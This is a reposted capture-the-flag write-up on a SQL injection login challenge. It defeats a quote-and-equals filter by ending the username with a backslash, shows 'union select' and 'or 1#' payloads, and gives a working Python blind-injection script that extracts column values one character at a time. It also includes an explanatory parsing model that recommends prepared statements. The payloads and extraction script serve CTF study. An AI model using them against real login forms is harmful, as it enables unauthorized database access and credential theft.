select * from users where username='$_POST["username"]' and password='$_POST["password"]';
Closing with ': the ' is filtered.
select * from users where username='123\' and password='union select 1,2,3#';
select * from users where username='123\' and password='or 1#';
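Why a username of 123\ moves the password value out of its string literal, as an added Python example that is not code from the original post: it models MySQL's default backslash-escape parsing. The function names are hypothetical, `quote_filter` is a constructed stand-in based only on the page's statement that ' and = are filtered, and `escape_mysql` is a simplified escaper for illustration.

```python
def code_outside_literals(query):
    """Return the text MySQL would parse as SQL code, i.e. everything outside
    single-quoted string literals and # comments (backslash escapes enabled)."""
    code, in_str, i = [], False, 0
    while i < len(query):
        ch = query[i]
        if in_str:
            if ch == "\\" or query[i:i + 2] == "''":
                i += 2              # escaped character stays inside the literal
                continue
            if ch == "'":
                in_str = False      # unescaped quote closes the literal
        elif ch == "'":
            in_str = True
        elif ch == "#":             # comment runs to the end of the line
            nl = query.find("\n", i)
            i = len(query) if nl == -1 else nl
            continue
        else:
            code.append(ch)
        i += 1
    return "".join(code)


def build_query(username, password):
    # Vulnerable pattern from the page: request values concatenated into SQL text.
    return ("select * from users where username='%s' and password='%s';"
            % (username, password))


def quote_filter(value):
    # Constructed stand-in for the blacklist: strips only ' and =.
    return value.replace("'", "").replace("=", "")


def escape_mysql(value):
    # Simplified escaping model: backslash first, then the quote.
    return value.replace("\\", "\\\\").replace("'", "\\'")


def input_reaches_code(sanitize, marker="CANARY"):
    """True if a harmless marker sent as the password ends up in code context
    when the username is 123\\ (the value used on the page)."""
    query = build_query(sanitize("123\\"), sanitize(marker))
    return marker in code_outside_literals(query)


if __name__ == "__main__":
    print("quote blacklist only :", input_reaches_code(quote_filter))
    print("backslash-aware escape:", input_reaches_code(escape_mysql))
```

The blacklist leaves the backslash untouched, so the quote that was meant to close the username literal is escaped and the literal only ends at the quote that was meant to open the password. Prepared statements avoid the problem entirely and are preferable to hand-written escaping.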
BJD needs to be stronger
```python
import requests
import time

url = "http://28c73fa1-00c6-4fe9-a54a-08730ca346ad.node3.buuoj.cn/"


def Get_Flag(url):
    Flag = ""
    for i in range(1, 30):
        Max = 128
        Min = 32
        Mid = (Max + Min) // 2
        while Min < Max:
            time.sleep(0.5)
            # payload = "or ascii(substr(database(),%d,1))>%d#"%(i,Mid)
            payload = 'or ascii(substr((username),{},1))>{}#'.format(i, Mid)
            # payload = 'or ascii(substr((password),{},1))>{}#'.format(i,Mid)
            data = {"username": "123\\", "password": payload}
            r = requests.post(url=url, data=data)
            if "stronger" in r.text:
                Min = Mid + 1
            else:
                Max = Mid
            Mid = (Max + Min) // 2
        if Min == 32 or Max == 128:
            print('break')
            break
        Flag = Flag + chr(Mid)
        print(Flag)


Get_Flag(url)
```
Later on, = is also filtered; be sure to watch for this next time.

Reposted from: http://gywmf.baihongyu.com/